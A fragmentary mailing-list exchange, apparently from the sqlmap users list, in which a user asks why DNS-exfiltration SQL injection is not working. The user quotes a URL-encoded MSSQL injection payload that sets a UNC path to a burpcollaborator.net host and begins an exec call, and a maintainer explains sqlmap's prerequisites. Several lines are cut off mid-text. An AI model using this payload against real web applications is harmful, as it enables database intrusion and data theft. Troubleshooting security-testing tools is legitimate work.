I have a situation where Burp has detected the following DNS exfiltration
injection for a query parameter in a web app:
GET
//Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20ma
.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A
173.213.231.200 (46)
16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
It doesn't seem like an injection pattern is being tried that is getting the
DNS exfiltration to occur... or else I'm doing something else wrong.
Thanks,
V
_
oslav Stampar
mailto:miroslav.stam...@gmail.com>> wrote:
As said, there should be at least one other SQLi technique available. In your
case there is NONE. sqlmap will not blindly use dns-exfil if at least one other
technique worked.
Bye
On Tue, Dec 20, 2016 at 12:01 AM, Mark M.
mailto:vv...@
